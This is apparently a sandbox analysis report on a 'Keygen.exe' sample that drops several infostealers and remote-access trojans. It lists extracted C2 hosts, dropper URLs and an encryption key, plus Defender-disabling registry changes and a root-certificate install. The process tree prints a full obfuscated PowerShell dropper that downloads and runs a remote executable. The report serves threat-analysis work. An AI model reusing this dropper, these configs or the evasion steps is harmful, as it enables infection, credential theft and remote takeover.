asyncrat | 1423053f90855d33858db47f354055b660943104c1c18f848c9b7b415979dc5f

Resubmissions

03-07-2024 16:04

240703-thygmaycpc 10

01-07-2024 18:12

01-07-2024 18:03

01-07-2024 18:03

01-07-2024 18:03

01-07-2024 18:03

01-07-2024 18:02

01-07-2024 18:02

22-11-2023 17:02

Analysis

max time kernel
1803s
max time network
1817s
platform
windows10_x64
resource
win10v20201028
submitted
19-11-2020 13:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Keygen.exe

Score

10^/10

asyncrat azorult modiloader oski raccoon remcos 5e4db353b88c002ba6466c06437973619aad03b3 xxxxxxxxxxx discovery evasion infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Family

raccoon

Botnet

5e4db353b88c002ba6466c06437973619aad03b3

Attributes

url4cnc
https://telete.in/brikitiki

rc4.plain

Extracted

Family

azorult

http://195.245.112.115/index.php

Extracted

Family

asyncrat

Version

0.5.7B

agentttt.ac.ug:6970

agentpurple.ac.ug:6970

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
anti_detection
false
autorun
false
bdos
false
delay
Default
host
agentttt.ac.ug,agentpurple.ac.ug
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
6970
version
0.5.7B

aes.plain

Extracted

Family

remcos

Version

2.7.2 Light

Botnet

xxxxxxxxxxx

taenaia.ac.ug:6969

agentpapple.ac.ug:6969

Attributes

audio_folder
MicRecords
audio_path
%AppData%
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
install_path
%AppData%
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
keylog_path
%AppData%
mouse_option
false
mutex
cvxdsaxzcas-FPRVUD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5
take_screenshot_title
wikipedia;solitaire;

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Contains code to disable Windows Defender 10 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral24/memory/4592-226-0x000000000040616E-mapping.dmp	disable_win_def
behavioral24/memory/4592-225-0x0000000000400000-0x000000000040C000-memory.dmp	disable_win_def
behavioral24/memory/1532-248-0x0000000000400000-0x0000000000408000-memory.dmp	disable_win_def
behavioral24/memory/1532-250-0x0000000000403BEE-mapping.dmp	disable_win_def
behavioral24/files/0x000200000001abc9-280.dat	disable_win_def
behavioral24/files/0x000200000001abc9-281.dat	disable_win_def
behavioral24/memory/3564-530-0x000000000040616E-mapping.dmp	disable_win_def
behavioral24/memory/3596-535-0x0000000000403BEE-mapping.dmp	disable_win_def
behavioral24/files/0x000300000001abe3-762.dat	disable_win_def
behavioral24/files/0x000300000001abe3-763.dat	disable_win_def

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 2 IoCs

Processes:

resource	yara_rule
behavioral24/memory/4780-143-0x0000000000400000-0x0000000000497000-memory.dmp	family_raccoon
behavioral24/memory/5304-359-0x000000000043FA56-mapping.dmp	family_raccoon

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Async RAT payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral24/memory/4580-229-0x000000000040C76E-mapping.dmp	asyncrat
behavioral24/memory/4580-227-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral24/memory/3528-515-0x000000000040C76E-mapping.dmp	asyncrat

ModiLoader First Stage 1 IoCs

Processes:

resource	yara_rule
behavioral24/memory/4620-287-0x00000000041C0000-0x000000000421C000-memory.dmp	modiloader_stage1

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow	pid	Process
11	4452	powershell.exe
12	1108	powershell.exe
15	1108	powershell.exe
16	4452	powershell.exe
17	3552	powershell.exe
19	3552	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 32 IoCs

Processes:

Keygen.exexso.exenrp.exetnz.exeFGbfttrev.exeFDvbcgfert.exenrp.exeFDvbcgfert.exeFGbfttrev.exes87WswzUoo.exe9yX7jXtPyr.exerRJ4xmowfr.exe2YYlGiVB3V.exerRJ4xmowfr.exes87WswzUoo.exe2YYlGiVB3V.exe2YYlGiVB3V.exeddad3vxa.exeazchgftrq.exexso.exeBQ50kvtGsn.exeVVa1pEtZCG.exeqNP7mU6QPh.exeho25uMdeM0.exeBQ50kvtGsn.exeqNP7mU6QPh.exeho25uMdeM0.exeozchgftrq.exeazchgftrq.exeazchgftrq.exeozchgftrq.exettuqy3sf.exe

pid	Process
3224	Keygen.exe
2332	xso.exe
1584	nrp.exe
3540	tnz.exe
1632	FGbfttrev.exe
4260	FDvbcgfert.exe
4780	nrp.exe
4928	FDvbcgfert.exe
4232	FGbfttrev.exe
180	s87WswzUoo.exe
4620	9yX7jXtPyr.exe
3236	rRJ4xmowfr.exe
3948	2YYlGiVB3V.exe
4592	rRJ4xmowfr.exe
4580	s87WswzUoo.exe
1180	2YYlGiVB3V.exe
1532	2YYlGiVB3V.exe
4504	ddad3vxa.exe
5288	azchgftrq.exe
5304	xso.exe
6000	BQ50kvtGsn.exe
6060	VVa1pEtZCG.exe
6092	qNP7mU6QPh.exe
4040	ho25uMdeM0.exe
3528	BQ50kvtGsn.exe
3564	qNP7mU6QPh.exe
3596	ho25uMdeM0.exe
5904	ozchgftrq.exe
4024	azchgftrq.exe
1468	azchgftrq.exe
4808	ozchgftrq.exe
5568	ttuqy3sf.exe

Loads dropped DLL 18 IoCs

Processes:

nrp.exeFDvbcgfert.exexso.exeozchgftrq.exe

pid	Process
4780	nrp.exe
4928	FDvbcgfert.exe
4928	FDvbcgfert.exe
4928	FDvbcgfert.exe
4780	nrp.exe
4780	nrp.exe
4780	nrp.exe
4780	nrp.exe
4780	nrp.exe
5304	xso.exe
5304	xso.exe
5304	xso.exe
5304	xso.exe
5304	xso.exe
5304	xso.exe
4808	ozchgftrq.exe
4808	ozchgftrq.exe
4808	ozchgftrq.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

ho25uMdeM0.exe2YYlGiVB3V.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	ho25uMdeM0.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	2YYlGiVB3V.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	2YYlGiVB3V.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

9yX7jXtPyr.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Zsle = "C:\\Users\\Admin\\AppData\\Local\\elsZ.url"	9yX7jXtPyr.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 2 IoCs

Processes:

nrp.exexso.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini	nrp.exe
File created	C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini	xso.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

nrp.exeFDvbcgfert.exeFGbfttrev.exe

pid	Process
4780	nrp.exe
4780	nrp.exe
4928	FDvbcgfert.exe
4928	FDvbcgfert.exe
4232	FGbfttrev.exe
4232	FGbfttrev.exe

Suspicious use of SetThreadContext 14 IoCs

Processes:

nrp.exeFDvbcgfert.exeFGbfttrev.exerRJ4xmowfr.exes87WswzUoo.exe2YYlGiVB3V.exexso.exeBQ50kvtGsn.exeqNP7mU6QPh.exeho25uMdeM0.exeazchgftrq.exeozchgftrq.exe9yX7jXtPyr.exeVVa1pEtZCG.exe

description	pid	Process	procid_target
PID 1584 set thread context of 4780	1584	nrp.exe	104
PID 4260 set thread context of 4928	4260	FDvbcgfert.exe	105
PID 1632 set thread context of 4232	1632	FGbfttrev.exe	106
PID 3236 set thread context of 4592	3236	rRJ4xmowfr.exe	124
PID 180 set thread context of 4580	180	s87WswzUoo.exe	125
PID 3948 set thread context of 1532	3948	2YYlGiVB3V.exe	128
PID 2332 set thread context of 5304	2332	xso.exe	165
PID 6000 set thread context of 3528	6000	BQ50kvtGsn.exe	174
PID 6092 set thread context of 3564	6092	qNP7mU6QPh.exe	175
PID 4040 set thread context of 3596	4040	ho25uMdeM0.exe	176
PID 5288 set thread context of 1468	5288	azchgftrq.exe	182
PID 5904 set thread context of 4808	5904	ozchgftrq.exe	184
PID 4620 set thread context of 3740	4620	9yX7jXtPyr.exe	197
PID 6060 set thread context of 4496	6060	VVa1pEtZCG.exe	229

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

FDvbcgfert.exeozchgftrq.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FDvbcgfert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ozchgftrq.exe

Delays execution with timeout.exe 4 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid	Process
2388	timeout.exe
3956	timeout.exe
192	timeout.exe
4432	timeout.exe

Kills process with taskkill 4 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
4504	taskkill.exe
1368	taskkill.exe
804	taskkill.exe
2808	taskkill.exe

Modifies registry class 1 IoCs

Processes:

cmd.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	cmd.exe

Modifies registry key 1 TTPs 5 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exe

pid	Process
2260	reg.exe
340	reg.exe
5624	reg.exe
5664	reg.exe
1588	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

9yX7jXtPyr.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	9yX7jXtPyr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	9yX7jXtPyr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exerRJ4xmowfr.exe

pid	Process
1108	powershell.exe
608	powershell.exe
4548	powershell.exe
4548	powershell.exe
4452	powershell.exe
1108	powershell.exe
1108	powershell.exe
608	powershell.exe
608	powershell.exe
4452	powershell.exe
4452	powershell.exe
4548	powershell.exe
1108	powershell.exe
4452	powershell.exe
4548	powershell.exe
608	powershell.exe
3552	powershell.exe
3552	powershell.exe
2100	powershell.exe
2100	powershell.exe
3552	powershell.exe
2100	powershell.exe
3552	powershell.exe
2100	powershell.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

nrp.exeFDvbcgfert.exeFGbfttrev.exe

pid	Process
1584	nrp.exe
4260	FDvbcgfert.exe
1632	FGbfttrev.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exewerfault.exes87WswzUoo.exerRJ4xmowfr.exerRJ4xmowfr.exe2YYlGiVB3V.exepowershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exexso.exe

description	pid	Process
Token: SeDebugPrivilege	1108	powershell.exe
Token: SeDebugPrivilege	608	powershell.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	4548	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeDebugPrivilege	1368	taskkill.exe
Token: SeRestorePrivilege	4428	werfault.exe
Token: SeBackupPrivilege	4428	werfault.exe
Token: SeDebugPrivilege	180	s87WswzUoo.exe
Token: SeDebugPrivilege	3236	rRJ4xmowfr.exe
Token: SeDebugPrivilege	4592	rRJ4xmowfr.exe
Token: SeDebugPrivilege	3948	2YYlGiVB3V.exe
Token: SeDebugPrivilege	508	powershell.exe
Token: SeDebugPrivilege	804	taskkill.exe
Token: SeDebugPrivilege	4188	powershell.exe
Token: SeIncreaseQuotaPrivilege	4188	powershell.exe
Token: SeSecurityPrivilege	4188	powershell.exe
Token: SeTakeOwnershipPrivilege	4188	powershell.exe
Token: SeLoadDriverPrivilege	4188	powershell.exe
Token: SeSystemProfilePrivilege	4188	powershell.exe
Token: SeSystemtimePrivilege	4188	powershell.exe
Token: SeProfSingleProcessPrivilege	4188	powershell.exe
Token: SeIncBasePriorityPrivilege	4188	powershell.exe
Token: SeCreatePagefilePrivilege	4188	powershell.exe
Token: SeBackupPrivilege	4188	powershell.exe
Token: SeRestorePrivilege	4188	powershell.exe
Token: SeShutdownPrivilege	4188	powershell.exe
Token: SeDebugPrivilege	4188	powershell.exe
Token: SeSystemEnvironmentPrivilege	4188	powershell.exe
Token: SeRemoteShutdownPrivilege	4188	powershell.exe
Token: SeUndockPrivilege	4188	powershell.exe
Token: SeManageVolumePrivilege	4188	powershell.exe
Token: 33	4188	powershell.exe
Token: 34	4188	powershell.exe
Token: 35	4188	powershell.exe
Token: 36	4188	powershell.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	3132	powershell.exe
Token: SeDebugPrivilege	1292	powershell.exe
Token: SeDebugPrivilege	4064	powershell.exe
Token: SeDebugPrivilege	768	powershell.exe
Token: SeDebugPrivilege	4624	powershell.exe
Token: SeDebugPrivilege	944	powershell.exe
Token: SeDebugPrivilege	372	powershell.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	2872	powershell.exe
Token: SeDebugPrivilege	4552	powershell.exe
Token: SeDebugPrivilege	2332	xso.exe
Token: SeIncreaseQuotaPrivilege	4784	powershell.exe
Token: SeSecurityPrivilege	4784	powershell.exe
Token: SeTakeOwnershipPrivilege	4784	powershell.exe
Token: SeLoadDriverPrivilege	4784	powershell.exe
Token: SeSystemProfilePrivilege	4784	powershell.exe
Token: SeSystemtimePrivilege	4784	powershell.exe
Token: SeProfSingleProcessPrivilege	4784	powershell.exe
Token: SeIncBasePriorityPrivilege	4784	powershell.exe
Token: SeCreatePagefilePrivilege	4784	powershell.exe
Token: SeBackupPrivilege	4784	powershell.exe
Token: SeRestorePrivilege	4784	powershell.exe
Token: SeShutdownPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeSystemEnvironmentPrivilege	4784	powershell.exe

Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

Keygen.exenrp.exetnz.exeFGbfttrev.exeFDvbcgfert.exerRJ4xmowfr.exeqNP7mU6QPh.exe

pid	Process
3224	Keygen.exe
1584	nrp.exe
3540	tnz.exe
1632	FGbfttrev.exe
4260	FDvbcgfert.exe
4592	rRJ4xmowfr.exe
4592	rRJ4xmowfr.exe
3564	qNP7mU6QPh.exe
3564	qNP7mU6QPh.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Keygen.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exepowershell.exepowershell.exepowershell.exenrp.exe

description	pid	Process	procid_target
PID 4776 wrote to memory of 3488	4776	Keygen.exe	74
PID 4776 wrote to memory of 3488	4776	Keygen.exe	74
PID 4776 wrote to memory of 3488	4776	Keygen.exe	74
PID 3488 wrote to memory of 3224	3488	cmd.exe	78
PID 3488 wrote to memory of 3224	3488	cmd.exe	78
PID 3488 wrote to memory of 3224	3488	cmd.exe	78
PID 3488 wrote to memory of 3464	3488	cmd.exe	79
PID 3488 wrote to memory of 3464	3488	cmd.exe	79
PID 3488 wrote to memory of 3464	3488	cmd.exe	79
PID 3488 wrote to memory of 4156	3488	cmd.exe	80
PID 3488 wrote to memory of 4156	3488	cmd.exe	80
PID 3488 wrote to memory of 4156	3488	cmd.exe	80
PID 3488 wrote to memory of 4432	3488	cmd.exe	81
PID 3488 wrote to memory of 4432	3488	cmd.exe	81
PID 3488 wrote to memory of 4432	3488	cmd.exe	81
PID 4156 wrote to memory of 608	4156	mshta.exe	82
PID 4156 wrote to memory of 608	4156	mshta.exe	82
PID 4156 wrote to memory of 608	4156	mshta.exe	82
PID 3464 wrote to memory of 1108	3464	mshta.exe	84
PID 3464 wrote to memory of 1108	3464	mshta.exe	84
PID 3464 wrote to memory of 1108	3464	mshta.exe	84
PID 3488 wrote to memory of 1892	3488	cmd.exe	86
PID 3488 wrote to memory of 1892	3488	cmd.exe	86
PID 3488 wrote to memory of 1892	3488	cmd.exe	86
PID 1892 wrote to memory of 4452	1892	mshta.exe	87
PID 1892 wrote to memory of 4452	1892	mshta.exe	87
PID 1892 wrote to memory of 4452	1892	mshta.exe	87
PID 3488 wrote to memory of 2008	3488	cmd.exe	88
PID 3488 wrote to memory of 2008	3488	cmd.exe	88
PID 3488 wrote to memory of 2008	3488	cmd.exe	88
PID 2008 wrote to memory of 4548	2008	mshta.exe	90
PID 2008 wrote to memory of 4548	2008	mshta.exe	90
PID 2008 wrote to memory of 4548	2008	mshta.exe	90
PID 3488 wrote to memory of 2388	3488	cmd.exe	92
PID 3488 wrote to memory of 2388	3488	cmd.exe	92
PID 3488 wrote to memory of 2388	3488	cmd.exe	92
PID 3488 wrote to memory of 3604	3488	cmd.exe	93
PID 3488 wrote to memory of 3604	3488	cmd.exe	93
PID 3488 wrote to memory of 3604	3488	cmd.exe	93
PID 3604 wrote to memory of 3552	3604	mshta.exe	94
PID 3604 wrote to memory of 3552	3604	mshta.exe	94
PID 3604 wrote to memory of 3552	3604	mshta.exe	94
PID 3488 wrote to memory of 4684	3488	cmd.exe	96
PID 3488 wrote to memory of 4684	3488	cmd.exe	96
PID 3488 wrote to memory of 4684	3488	cmd.exe	96
PID 4684 wrote to memory of 2100	4684	mshta.exe	97
PID 4684 wrote to memory of 2100	4684	mshta.exe	97
PID 4684 wrote to memory of 2100	4684	mshta.exe	97
PID 4452 wrote to memory of 2332	4452	powershell.exe	99
PID 4452 wrote to memory of 2332	4452	powershell.exe	99
PID 4452 wrote to memory of 2332	4452	powershell.exe	99
PID 1108 wrote to memory of 1584	1108	powershell.exe	100
PID 1108 wrote to memory of 1584	1108	powershell.exe	100
PID 1108 wrote to memory of 1584	1108	powershell.exe	100
PID 3552 wrote to memory of 3540	3552	powershell.exe	101
PID 3552 wrote to memory of 3540	3552	powershell.exe	101
PID 3552 wrote to memory of 3540	3552	powershell.exe	101
PID 1584 wrote to memory of 1632	1584	nrp.exe	102
PID 1584 wrote to memory of 1632	1584	nrp.exe	102
PID 1584 wrote to memory of 1632	1584	nrp.exe	102
PID 1584 wrote to memory of 4260	1584	nrp.exe	103
PID 1584 wrote to memory of 4260	1584	nrp.exe	103
PID 1584 wrote to memory of 4260	1584	nrp.exe	103
PID 1584 wrote to memory of 4780	1584	nrp.exe	104

C:\Users\Admin\AppData\Local\Temp\Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3488
- - C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\Keygen.exe
    Keygen.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3224
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3464
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1108
    - - C:\Users\Public\nrp.exe
        
        "C:\Users\Public\nrp.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1584
      - C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
        6⤵
        Executes dropped EXE
